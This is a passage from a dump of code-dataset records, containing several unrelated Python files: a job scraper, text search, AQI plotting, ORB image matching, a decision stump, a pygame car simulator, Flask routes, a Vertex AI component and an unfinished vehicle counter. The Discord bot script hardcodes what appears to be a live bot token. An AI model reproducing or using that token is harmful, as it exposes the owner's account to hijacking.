html.xpath('//tr[@class=\"c\"][2]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n item = []\n jobduties = html.xpath('//tr[@class=\"c\"][1]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n jobrequirement = html.xpath('//tr[@class=\"c\"][2]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n\n# item.append([meta['title'],meta['link'],meta['category'],meta['num'],\n# meta['city'],meta['time'],jobduties,jobrequirement])\n item.append([jobduties,jobrequirement])\n yield item[0]\n\ndef find(baseurl,offset):\n url = baseurl + offset\n html = loadurl(url)\n result1 = html.xpath('//tr[@class=\"even\" or @class=\"odd\"]')\n item = {}\n for i in result1:\n title = 
i.xpath('./td[1]/a/text()')[0]\n link = baseurl + i.xpath('./td[1]/a/@href')[0]\n if len(i.xpath('./td[2]/text()')) == 0:\n category = ''\n else:\n category = i.xpath('./td[2]/text()')[0]\n num = i.xpath('./td[3]/text()')[0]\n city = i.xpath('./td[4]/text()')[0]\n time = i.xpath('./td[5]/text()')[0]\n \n \n item['title']=title\n item['link']=link\n item['category']=category\n item['num']=num\n item['city']=city\n item['time']=time\n \n for a in findlist(link,meta={'title':title,'category':category,'num':num,\n 'city':city,'time':time,'link':link}):\n print(a[0])\n print('_'*64)\n print(a[1])\n print('*'*64)\n item['jobduties'] = a[0]\n item['jobrequirement'] = a[1]\n yield item\n \n \n \n# if len(html.xpath('//*[@id=\"next\"]/@class')) == 0:\n# offset = html.xpath('//*[@id=\"next\"]/@href')[0]\n# for i in find(baseurl,offset):\n# yield i\n\nif __name__ =='__main__':\n# print(datetime.now())\n# for item in find(baseurl,offset):\n# insertsql = \"insert into job3 values(?,?,?,?,?,?,?,?)\"\n# c.execute(insertsql,(item[0],item[1],item[2],item[3],item[4],item[5],item[6],item[7]))\n# conn.commit()\n# print(datetime.now())\n# sql = 'select * from job3'\n# df = pd.read_sql(sql,conn)\n\n\n with open('joblist.txt','w+',encoding='utf-8') as f:\n print(datetime.now())\n for item in find(baseurl,offset):\n #print(item)\n #b = ' '.join(item[0])\n b = json.dumps(item,ensure_ascii=False)\n f.write(b+'\\n')\n print(datetime.now())\n\n\n# ceshi = DataFrame({\"title\":[],\"link\": [],\"category\": [],\"num\": [],\"city\":[],\n# \"time\": [],\"jobduties\": [],\"jobrequirement\":[]})\n# print(datetime.now())\n# for item in find(baseurl,offset):\n# frame = DataFrame.from_dict(item,orient='index').T\n# #ceshi = pd.concat([ceshi,frame],ignore_index=True)\n# ceshi = ceshi.append(frame,ignore_index=True)\n# ceshi.to_csv('job.csv')\n# print(datetime.now())\n","sub_path":"tencentjob.py","file_name":"tencentjob.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"108639213","text":"import pymorphy2\nmorph = pymorphy2.MorphAnalyzer()\n\nrequest = ''\nword = ''\narr = []\nwhile word != 'done':\n request = input().split()\n with open(\"url's.txt\", 'a') as online:\n for word in request:\n if word != 'done':\n arr += [word]\n online.write('\\n' + 'https://ru.wikipedia.org/wiki/' + word)\n\n\nindex = dict()\ns = ''\nkey = ''\nvalue = ''\nlabel = 1\nwith open('index.txt', 'r', encoding='utf8') as ind:\n for line in ind:\n s += str(line)\n\n\ni = 0\nl_1 = 1\nwhile i != len(s):\n l_1 = 1\n if i >= len(s) - 3:\n break\n key = ''\n while s[i] != \"'\":\n i += 1\n if s[i] == \"'\" and s[i + 1] == \"'\":\n while 1:\n i += 1\n if s[i] == \"[\":\n i += 1\n if s[i] == \"]\":\n i += 3\n break \n while 1:\n i += 1\n if s[i] == \"'\":\n break\n key += s[i]\n index.update({key : []})\n\n while s[i] != \"[\":\n i += 1\n while s[i] != \"'\":\n i += 1\n\n while 1:\n value = ''\n while 1:\n i += 1\n if s[i] == \"'\":\n if s[i + 1] == \"]\":\n i += 1\n index[key] += [value]\n l_1 = 0\n break\n elif s[i + 1] == \",\":\n i += 3\n index[key] += [value]\n break\n elif s[i + 1] == \"}\":\n l_1 = 0\n break\n value += s[i]\n if l_1 == 0:\n break\n\n\nset_1 = set()\nset_2 = set()\nfor i in index.values():\n for j in i:\n set_1.update({j})\n\nfor word in arr:\n p = morph.parse(word.lower())[0].normal_form\n if p in index.keys():\n #print(word, index[p])\n for i in index[p]:\n set_2.update({i})\n set_1 = set_1.intersection(set_2)\n #else:\n 
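# (illustrative note, added) index.txt is parsed above as a repr-style dict\n        # mapping normal forms to the files that contain them, e.g.\n        # {'word': ['doc1.txt', 'doc2.txt']}; these file names are hypothetical.\n        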
#print('None')\n\nprint('Your phrase is in these files:\\n', set_1)\n","sub_path":"customer's_req_0_1.py","file_name":"customer's_req_0_1.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"516877174","text":"import discord\nfrom discord.ext import commands\n\ntoken = \"NTMzNjY2OTA3NzMyMTgxMDIy.DxuXjg.KGMCrBelTXKUCygFw1TNFblBJV8\"\n\nclient = commands.Bot(command_prefix = '.', activity=discord.Game(name=\"ANNENLE\"))\n\n@client.event\nasync def on_ready():\n    print(\"All Running\")\n\n@client.event\nasync def on_message(message):\n    if message.content.startswith(\".\"):\n        await client.process_commands(message)\n    else:\n        author = str(message.author)\n        if (message.author != client.user):\n            if (\"seco\" in author):\n                await client.send_message(message.channel, \"Stop talking nonsense, do some work!\")\n\n@client.command(pass_context=True)\nasync def clear(ctx, amount=5):\n    channel = ctx.message.channel\n    messages = []\n    async for message in client.logs_from(channel, limit=int(amount)+2):\n        messages.append(message)\n    await client.delete_messages(messages)\n    await client.say(\"Messages Deleted\")\n\n\nclient.run(token)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"501136655","text":"try:\n\tn = int(input(\"Enter Number \"))\nexcept ValueError as e:\n\texit(0)\t\nif(n <= 0):\n\texit(0)\n\nfor i in range(1,n*n+1,n):\n\tprint(i, end = ' ')\n\t\nprint()\n\n","sub_path":"Day 16/16-DailyFlash_Solutions/31_Jan_Solutions_Two/Python/progam1.py","file_name":"progam1.py","file_ext":"py","file_size_in_byte":153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"330871986","text":"\"\"\"\nAuthor: boy-tech\nFunction: air quality (AQI) check - crawl real-time data for all cities, save it locally (csv), then use pandas to analyze, clean and visualize the data\nVersion: 10.0\nDate: 2019/12/28\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef main():\n    \"\"\"\n    Main function\n    \"\"\"\n    aqi_date = pd.read_csv('china_city_aqi.csv')\n    print('Basic info:')\n    print(aqi_date.info())\n\n    print('Data preview:')\n\n    print(aqi_date.head())\n\n    # Data cleaning\n    # Keep only rows with AQI > 0\n    # filter_condition = aqi_date['AQI'] > 0\n    # clean_aqi_date = aqi_date[filter_condition]\n\n    clean_aqi_date = aqi_date[aqi_date['AQI'] > 0]\n\n    # Basic statistics\n\n    print('AQI max:', clean_aqi_date['AQI'].max())\n    print('AQI min:', clean_aqi_date['AQI'].min())\n    print('AQI mean:', clean_aqi_date['AQI'].mean())\n\n    # Top 50 cities by air quality\n    top50_cities = clean_aqi_date.sort_values(by=['AQI']).head(50)\n    # print('Top 10 cities with the best air quality')\n    # print(top50_cities)\n\n    # Data visualization\n    top50_cities.plot(kind='bar', x='City', y='AQI', title='Top 50 cities with the best air quality',\n                      figsize=(20, 10))\n    plt.savefig('top50_bar_aqi.png')\n    plt.show()\n\n    # bottom10: the 10 cities with the worst air quality\n    # bottom10_cities = aqi_date.sort_values(by=['AQI']).tail(10)\n    # Sort in descending order\n    # bottom10_cities = clean_aqi_date.sort_values(by=['AQI'], ascending=False).head(10)\n    # print('10 cities with the worst air quality')\n    # print(bottom10_cities)\n\n    # Save data as CSV\n    # top10_cities.to_csv('top10_aqi.csv', index=False)\n    # bottom10_cities.to_csv('bottom10_aqi.csv', index=False)\n\n\nif __name__ == '__main__':\n    main()","sub_path":"air_quality_check_v10.py","file_name":"air_quality_check_v10.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
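(Editorial aside on the pandas idiom in the AQI script above: sort_values(by=['AQI']).head(50) can be written more directly with DataFrame.nsmallest / nlargest, which also avoid sorting the whole frame. A minimal sketch, assuming the clean_aqi_date frame and the 'AQI' column from that script:)
top50_cities = clean_aqi_date.nsmallest(50, 'AQI')    # lowest AQI = best air quality
bottom10_cities = clean_aqi_date.nlargest(10, 'AQI')  # highest AQI = worst air quality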
+{"seq_id":"301949394","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg1 = cv2.imread('c1.png',0)\nimg2 = cv2.imread('bicho.jpg',0)\n\n# Initiate STAR detector\n# int nfeatures=500, float scaleFactor=1.2f, int nlevels=8, int edgeThreshold=31, int firstLevel=0, int WTA_K=2, int scoreType=ORB::HARRIS_SCORE, int patchSize=31, int fastThreshold=20\norb = cv2.ORB_create(nfeatures=500, edgeThreshold=50, patchSize=50)\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = orb.detectAndCompute(img1,None)\nkp2, des2 = orb.detectAndCompute(img2,None)\n# create BFMatcher object\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n# Match descriptors.\nmatches = bf.match(des1,des2)\n\n# Sort them in the order of their distance.\nmatches = sorted(matches, key = lambda x:x.distance)\n\nfor m in matches[:20]:\n\tprint(m.distance)\n\n# Draw first 10 matches.\nimg3 = cv2.drawMatches(img1,kp1,img2,kp2,matches[:10], None, flags=2)\n\nplt.imshow(img3),plt.show()\n\n\n\n#http://stackoverflow.com/questions/31630559/attributeerror-module-object-has-no-attribute-orb\n#http://stackoverflow.com/questions/31631352/typeerror-required-argument-outimg-pos-6-not-found/31631995#31631995\n# probar cosas del email de Nano\n# probar codigo en plugin de Image clouduki whatever\n\n\n\"\"\"\n\n# find the keypoints with ORB\nkp = orb.detect(img,None)\n\n# compute the descriptors with ORB\nkp, des = orb.compute(img, kp)\n\n# draw only keypoints location,not size and orientation\nimg2 = cv2.drawKeypoints(img,kp,None,color=(255,0,0), flags=0)\nplt.imshow(img2),plt.show()\n\"\"\"","sub_path":"python/feature_matching.py","file_name":"feature_matching.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"433931407","text":"import FWCore.ParameterSet.Config as cms\nuds = cms.EDAnalyzer(\"DataCardFileWriter\",\n\tFileName = cms.string(\"uds.dec\"),\n\tFileContent = cms.vstring()\n\t)\nuds.FileContent.extend([\n\t\"#\",\n\t\"# Force the fragmentation to produce a ddbar, uubar or ssbar pair\",\n\t\"#\",\n\t\"# Contact: Anders Ryd (ryd@hep.caltech.edu)\",\n\t\"#\",\n\t\"Decay vpho\",\n\t\"1.0 JSCONT 1;\",\n\t\"4.0 JSCONT 2;\",\n\t\"1.0 JSCONT 3;\",\n\t\"Enddecay\",\n\t\"End\"\n\t])\n","sub_path":"python/uds.py","file_name":"uds.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448074369","text":"def get_mean_value(arr):\n return sum(arr) / len(arr)\n\ndef load(filename):\n items = []\n data = open(filename)\n for line in data.readlines():\n x, y = map(float, line.strip().split())\n items.append([x, y])\n return items\n\ndef get_partitions(items):\n result = []\n for i in range(len(items) - 1):\n cur_el = items[i][0]\n next_el = items[i + 1][0]\n result.append((cur_el + next_el) / 2)\n return result\n\n\ndef getABValues(m, items):\n left = []\n right = []\n for i in range(len(items)):\n el = items[i][0]\n if el > m:\n right.append(el)\n else:\n left.append(el)\n\n return left, right\n\ndef f(a, b, m, x):\n if x > m:\n return b\n else:\n return a \n\n\ndef get_min_index(arr):\n min_value = arr[0]\n index = 0\n for i in range(len(arr)):\n if arr[i] < min_value:\n index = i\n min_value = arr[i]\n return index\n\ndef get_result_varients(partitions):\n result_variants = []\n for m in partitions:\n left, right = getABValues(m, items)\n meanLeft = get_mean_value(left)\n meanRight = get_mean_value(right)\n 
result_variants.append((meanLeft, meanRight, m))\n return result_variants\n\ndef get_sse_values(result_variants, items):\n sse_values = []\n for i in range(len(result_variants)):\n a, b, m = result_variants[i]\n sse = 0\n\n for i in range(len(items)):\n el = items[i]\n q = f(a, b, m, el[0]) - el[1]\n sse += q * q\n\n sse_values.append(sse)\n return sse_values\n\ndef get_result(sse_values, result_variants):\n result_index = get_min_index(sse_values)\n best_a, best_b, best_m = result_variants[result_index]\n result = str(best_a) + ' ' + str(best_b) + ' ' + str(best_m)\n return result\n\ndef save(filename, result):\n output_file = open(filename, 'w')\n output_file.write(result)\n output_file.close()\n\nitems = load('stump.in')\nitems.sort()\npartitions = get_partitions(items)\nresult_variants = get_result_varients(partitions)\nsse_values = get_sse_values(result_variants, items)\nresult = get_result(sse_values, result_variants)\nsave('stump.out', result)","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"353094432","text":"\n###create environment with car, obstacle, and the destination###\n\nimport pygame\nfrom pygame import gfxdraw\nimport math\nimport numpy\n# import fuzzy_system\nimport PSOYX1\nimport time\n#Car object with draw the car and obstacleDistance\nclass Car(object):\n def __init__(self, RBFN, x, y, degree, magnification, edge):\n self.x = x\n self.y = y\n self.xytrack = []\n #Coordinate angle\n self.degree = degree\n self.radius = 3 * magnification\n #steeringWheel moment angle\n self.steeringWheel = 0\n self.b = self.radius*2\n\n self.edge = edge\n self.detectRadius = 50 * magnification\n self.straight = 50 * magnification\n self.right = 50 * magnification\n self.left = 50 * magnification\n\n self.train4D = open(\"outputTrain4D.txt\", 'w')\n self.train6D = open(\"outputTrain6D.txt\", 'w')\n\n self.RBFN = RBFN\n\n def draw(self, gameDisplay):\n self._carMove(gameDisplay)\n\n pygame.draw.circle(gameDisplay, (255, 0, 0), (int(self.x), int(self.y)), self.radius)\n\n IntersectPointX, IntersectPointY = self._sensorDeal(self.degree)\n self.straight = self._obstacleDistance(IntersectPointX, IntersectPointY)\n pygame.draw.line(gameDisplay, (0, 255, 0), (self.x, self.y),\n (IntersectPointX, IntersectPointY))\n\n IntersectPointX, IntersectPointY = self._sensorDeal(self.degree-45)\n self.right = self._obstacleDistance(IntersectPointX, IntersectPointY)\n pygame.draw.line(gameDisplay, (0, 255, 0), (self.x, self.y),\n (IntersectPointX, IntersectPointY))\n\n IntersectPointX, IntersectPointY = self._sensorDeal(self.degree+45)\n self.left = self._obstacleDistance(IntersectPointX, IntersectPointY)\n pygame.draw.line(gameDisplay, (0, 255, 0), (self.x, self.y),\n (IntersectPointX, IntersectPointY))\n\n def getCar_X_Y(self):\n return self.x, self.y\n\n def _sensorDeal(self, degree):\n pointx, pointy = self._setInitialLinePosition(degree)\n IntersectPointX, IntersectPointY = self._findIntersectPoint(pointx, pointy)\n return IntersectPointX, IntersectPointY\n\n def _obstacleDistance(self, IntersectPointX, IntersectPointY):\n distance = math.hypot(int(self.x) - IntersectPointX, int(self.y) - IntersectPointY)\n return distance\n\n def _setInitialLinePosition(self, degree):\n pointx = int(self.x) + self.detectRadius * math.cos(math.radians(degree))\n pointy = int(self.y) - self.detectRadius * math.sin(math.radians(degree))\n return pointx, pointy\n\n def 
_findIntersectPoint(self, pointx, pointy):\n IntersectPointX, IntersectPointY = 0, 0\n minDistance = self.detectRadius\n Line1p1 = (int(self.x), int(self.y))\n Line1p2 = (int(pointx), int(pointy))\n for i in range(len(self.edge)-1):\n Line2p1 = (self.edge[i, 0], self.edge[i, 1])\n Line2p2 = (self.edge[i+1, 0], self.edge[i+1, 1])\n IntersectPoint = PSOYX1.calculateIntersectPoint(Line1p1, Line1p2, Line2p1, Line2p2)\n if IntersectPoint != None:\n distance = self._obstacleDistance(IntersectPoint[0], IntersectPoint[1])\n if distance < minDistance:\n minDistance = distance\n IntersectPointX, IntersectPointY = IntersectPoint[0], IntersectPoint[1]\n\n return IntersectPointX, IntersectPointY\n\n def _carMove(self, gameDisplay):\n if self.straight >= 100:\n self.straight = 0\n if self.right >= 100:\n self.right = 0\n if self.left >= 100:\n self.left = 0\n\n self.outputTxtFile()\n #set steeringWheel by RBFN\n steeringWheel = self.RBFN.get_steeringWheel(self.straight, self.right, self.left)\n self._setSteeringWheelAngle(steeringWheel)\n\n time.sleep(0.01)\n self.x = self.x + math.cos(math.radians(self.degree + self.steeringWheel)) +\\\n math.sin(math.radians(self.degree)) * math.sin(math.radians(self.steeringWheel))\n self.y = self.y - (math.sin(math.radians(self.degree + self.steeringWheel)) + \\\n math.sin(math.radians(self.steeringWheel)) * math.cos(math.radians(self.degree)))\n\n self.degree = self.degree - math.degrees(math.asinh(2*math.sin(math.radians(self.steeringWheel))/self.b))\n\n self.xytrack.append([int(self.x), int(self.y)])\n for i in self.xytrack:\n gfxdraw.pixel(gameDisplay, i[0], i[1], (255, 0, 0))\n\n def _setSteeringWheelAngle(self, steeringWheel):\n if steeringWheel > 40:\n steeringWheel = 40\n elif steeringWheel < -40:\n steeringWheel = -40\n self.steeringWheel = steeringWheel\n\n def outputTxtFile(self):\n self.train4D.write(' '.join((str(self.straight/2), str(self.right/2), str(self.left/2), str(self.steeringWheel), \"\\n\")))\n self.train6D.write(' '.join((str((self.x-400)/2), str((-(self.y-300))/2), str(self.straight/2), str(self.right/2), str(self.left/2), str(self.steeringWheel), \"\\n\")))\n\n#The end of the car have to arrive\nclass Destination(object):\n def __init__(self, positionx, positiony, rangex, rangey):\n self.positionx = positionx\n self.positiony = positiony\n self.rangex = rangex\n self.rangey = rangey\n def draw(self, gameDisplay):\n #self.positionx, self.positiony are the coordinates of the upper left hand corner\n pygame.draw.rect(gameDisplay, (0, 0, 0), [self.positionx, self.positiony, self.rangex, self.rangey])\n def detectCarCollision(self, CarX, CarY):\n if (self.positionx < CarX and CarX < self.positionx+self.rangex)\\\n and (self.positiony > CarY and CarY > self.positiony+self.rangey):\n return True\n return False\n\n#Draw the wall\nclass Edge(object):\n def __init__(self, edge):\n self.edge = edge\n\n def draw(self, gameDisplay):\n for i in range(len(self.edge)-1):\n pygame.draw.line(gameDisplay, (0, 0, 255), (self.edge[i,0], self.edge[i,1]), (self.edge[i+1,0], self.edge[i+1,1]))\n\n\n","sub_path":"PSOYX4.py","file_name":"PSOYX4.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"375646325","text":"from flask import Blueprint, Response, request, jsonify\nfrom flask_login import login_required\n\nfrom db import db\nfrom models.Host import Host\nfrom utils.request_utils import Serializer\n\nhost = Blueprint('host', __name__)\n\n\n# admin route for getting 
all hosts\n@host.route('/', methods=['GET'])\n@login_required\ndef index():\n _hosts = Host.query.all()\n return jsonify(Serializer.serialize_list(_hosts))\n\n\n# admin route for getting a single host\n@host.route('/host', methods=['GET'])\n@login_required\ndef show():\n return Host.by_id(request.args.get('host_id')).serialize()\n\n\n# public facing signup route (no login required) - allows a host to enter\n# their info but cannot set w9 status\n@host.route('/signup', methods=['POST'])\ndef signup_host():\n new_host = Host.make_new(request.json)\n db.session.add(new_host)\n db.session.commit()\n return Response('submit success', status=201, mimetype='application/json')\n\n\n# admin route for adding a host - can set w9 bool\n@host.route('/add', methods=['POST'])\n@login_required\ndef add_host():\n data = request.json\n new_host = Host.make_new(data)\n\n if 'w9_received' in data:\n new_host.w9_received = data['w9_received']\n\n db.session.add(new_host)\n db.session.commit()\n return Response('Host {} {} created'.format(new_host.first_name, new_host.last_name),\n status=201, mimetype='application/json')\n\n\n# admin route for updating a host\n@host.route('/update', methods=['POST'])\n@login_required\ndef update_host():\n Host.update(request.json)\n return Response('host updated', status=200, mimetype='application/json')\n","sub_path":"controllers/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"251684810","text":"from typing import NamedTuple\n\nfrom kfp.components import create_component_from_func, InputPath, OutputPath\n\n\ndef upload_Scikit_learn_pickle_model_to_Google_Cloud_Vertex_AI(\n model_path: InputPath(\"ScikitLearnPickleModel\"),\n sklearn_version: str = None,\n\n display_name: str = None,\n description: str = None,\n\n # Uncomment when anyone requests these:\n # instance_schema_uri: str = None,\n # parameters_schema_uri: str = None,\n # prediction_schema_uri: str = None,\n # explanation_metadata: \"google.cloud.aiplatform_v1.types.explanation_metadata.ExplanationMetadata\" = None,\n # explanation_parameters: \"google.cloud.aiplatform_v1.types.explanation.ExplanationParameters\" = None,\n\n project: str = None,\n location: str = \"us-central1\",\n labels: dict = None,\n # encryption_spec_key_name: str = None,\n staging_bucket: str = None,\n) -> NamedTuple(\"Outputs\", [\n (\"model_name\", \"GoogleCloudVertexAiModelName\"),\n (\"model_dict\", dict),\n]):\n import datetime\n import json\n import os\n import shutil\n import tempfile\n from google.cloud import aiplatform\n\n if not location:\n location = os.environ.get(\"CLOUD_ML_REGION\")\n\n if not labels:\n labels = {}\n labels[\"component-source\"] = \"github-com-ark-kun-pipeline-components\"\n\n # The serving container decides the model type based on the model file extension.\n # So we need to rename the mode file (e.g. 
/tmp/inputs/model/data) to *.pkl\n _, renamed_model_path = tempfile.mkstemp(suffix=\".pkl\")\n shutil.copyfile(src=model_path, dst=renamed_model_path)\n\n display_name = display_name or \"Scikit-learn model \" + datetime.datetime.now().isoformat(sep=\" \")\n\n model = aiplatform.Model.upload_scikit_learn_model_file(\n model_file_path=renamed_model_path,\n sklearn_version=sklearn_version,\n\n display_name=display_name,\n description=description,\n\n # instance_schema_uri=instance_schema_uri,\n # parameters_schema_uri=parameters_schema_uri,\n # prediction_schema_uri=prediction_schema_uri,\n # explanation_metadata=explanation_metadata,\n # explanation_parameters=explanation_parameters,\n\n project=project,\n location=location,\n labels=labels,\n # encryption_spec_key_name=encryption_spec_key_name,\n staging_bucket=staging_bucket,\n )\n model_json = json.dumps(model.to_dict(), indent=2)\n print(model_json)\n return (model.resource_name, model_json)\n\nif __name__ == \"__main__\":\n # Getting input descriptions\n # try:\n # from google.cloud import aiplatform\n # upload_Scikit_learn_model_to_Google_Cloud_Vertex_AI.__doc__ = aiplatform.Model.upload_scikit_learn_model_file.__doc__\n # except ImportError:\n # pass\n\n upload_Scikit_learn_pickle_model_to_Google_Cloud_Vertex_AI_op = create_component_from_func(\n func=upload_Scikit_learn_pickle_model_to_Google_Cloud_Vertex_AI,\n base_image=\"python:3.9\",\n packages_to_install=[\n # \"google-cloud-aiplatform==1.10.0\",\n \"git+https://github.com/Ark-kun/python-aiplatform@9b50f62b9d1409644656fb3202edc7be19c722f4#egg=google-cloud-aiplatform&subdirectory=.\" # branch: fix--Fixed-getitng-project-ID-when-running-on-Vertex-AI\n ],\n annotations={\n \"author\": \"Alexey Volkov \",\n \"canonical_location\": \"https://raw.githubusercontent.com/Ark-kun/pipeline_components/master/components/google-cloud/Vertex_AI/Models/Upload_Scikit-learn_pickle_model/component.yaml\",\n },\n output_component_file=\"component.yaml\",\n )\n","sub_path":"components/google-cloud/Vertex_AI/Models/Upload_Scikit-learn_pickle_model/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"158779520","text":"import math\nimport numpy as np\n\ncolors = [(18, 0, 230),\n (0, 152, 243),\n (31, 195, 143),\n (68, 153, 0),\n (150, 158, 0),\n (233, 160, 0),\n (183, 104, 0),\n (136, 32, 29),\n (131, 7, 146),\n (128, 0, 228),\n (79, 0, 229)]\n\n\nclass Counter(object):\n def __init__(self, video_size, class_names, resize_ratio):\n print('video_size:', video_size)\n self.class_names = class_names\n self.resize_ratio = resize_ratio\n self.width, self.height = video_size\n self.used_label_idxs = []\n self.overlap_dicts = []\n self.use_labels = ['car', 'bus', 'truck']\n self.entry_from_left_range = [round(self.width * 0.25), round(self.width * 0.4)]\n self.entry_from_right_range = [round(self.width * 0.6), round(self.width * 0.75)]\n self.exit_to_left_range = [0, round(self.width * 0.25)]\n self.exit_to_right_range = [round(self.width * 0.75), self.width]\n self.entry_from_left_count = 0\n self.entry_from_right_count = 0\n self.exit_to_left_count = 0\n self.exit_to_right_count = 0\n\n self.pre_detected_obj_dicts = {}\n\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n def process_on_frame(self, image, 
out_boxes, out_scores, out_classes):\n detected_obj_dicts = {}\n use_label_idxs = []\n\n label_idx = 0\n\n out_boxes_2 = []\n out_label_idxs = []\n out_scores_2 = []\n out_classes_2 = []\n out_colors_2 = []\n\n closenesses = [] # 検出した車体間の座標の近さ\n #for idx, x in enumerate(output):\n for idx, c in enumerate(out_classes):\n i = idx\n predicted_class = self.class_names[c]\n label = predicted_class\n box = out_boxes[i]\n score = out_scores[i]\n\n top, left, bottom, right = box\n # top = max(0, np.floor(top + 0.5).astype('int32'))\n # left = max(0, np.floor(left + 0.5).astype('int32'))\n # bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n # right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n\n area = (right - left) * (bottom - top)\n # 小さく映っている車は排除\n if area < 8000 * self.resize_ratio ** 2:\n continue\n\n center = (int((right - left) / 2 + left), int((bottom - top) / 2 + top))\n\n # 端っこに映っている車は排除\n if center[0] < self.width * 0.05 or self.width * 0.95 < center[0]:\n continue\n\n #cls = int(x[-1])\n #label = \"{0}\".format(classes[cls])\n\n if label in self.use_labels:\n # 前のフレームに車体が無かったとき\n if len(self.pre_detected_obj_dicts) == 0:\n if idx == 0:\n self.used_label_idxs = []\n self.overlap_dicts = []\n\n color = colors[label_idx % len(colors)]\n\n # 同じ物体を複数回検出している問題を解決\n break_flag = False\n for k, v in detected_obj_dicts.items():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n\n if close < 400 * self.resize_ratio ** 2:\n break_flag = True\n break\n if break_flag: continue\n\n # 車体が進入範囲にあるか調べる\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n is_entried_from_left = True\n is_entried_from_right = False\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n is_entried_from_left = False\n is_entried_from_right = True\n self.entry_from_right_count += 1\n else:\n is_entried_from_left = False\n is_entried_from_right = False\n\n # 車体が退出範囲にあるか調べる\n is_exited_to_left = False\n is_exited_to_right = False\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': True,\n 'direction': 'unknown',\n 'speed': 'unknown',\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n\n # 検出した車体間の座標の近さを計算\n closes = []\n for v in detected_obj_dicts.values():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n closes.append(close)\n closenesses.append(closes)\n\n use_label_idxs.append(label_idx)\n use_label_idxs.sort()\n if not label_idx in self.used_label_idxs:\n self.used_label_idxs.append(label_idx)\n self.used_label_idxs.sort()\n detected_obj_dicts[label_idx] = detected_obj_dict\n out_boxes_2.append(box)\n out_label_idxs.append(label_idx)\n out_scores_2.append(score)\n out_classes_2.append(c)\n out_colors_2.append(color)\n label_idx += 1\n # 前のフレームに車体が有ったとき\n else:\n # 前フレームで検出された物体と同一の物体か確かめる\n label_idx = None\n min_distance = None\n color = None\n\n break_flag = False\n for max_distance in (40, 80, 120, 160, 200): # なるべく一番近いものが優先されるように、ちょっとずつ調べる\n max_distance *= self.resize_ratio ** 2\n for k, v in self.pre_detected_obj_dicts.items():\n pre_center 
= v['center']\n pre_label_idx = k\n pre_color = v['color']\n\n # 走行していることを考慮する\n speed = v['speed']\n if speed != 'unknown':\n distance = math.sqrt((center[0] - pre_center[0] - speed) ** 2 + (center[1] - pre_center[1]) ** 2)\n else:\n distance = math.sqrt((center[0] - pre_center[0]) ** 2 + (center[1] - pre_center[1]) ** 2)\n\n if distance > max_distance: # あまりにも離れていたら止める\n continue\n elif min_distance is None or min_distance > distance:\n label_idx = pre_label_idx\n color = pre_color\n min_distance = distance\n break_flag = True\n break\n if break_flag:\n break\n\n # 前フレームに同一と思われる物体がない場合(新しい物体だと認識する)\n if min_distance is None:\n # 最後のラベル番号+1\n label_idx = self.used_label_idxs[-1] + 1\n is_first_frame_detected = True\n direction = 'unknown'\n speed = 'unknown'\n\n # 車体が進入範囲にあるか調べる\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n is_entried_from_left = True\n is_entried_from_right = False\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n is_entried_from_left = False\n is_entried_from_right = True\n self.entry_from_right_count += 1\n else:\n is_entried_from_left = False\n is_entried_from_right = False\n\n # 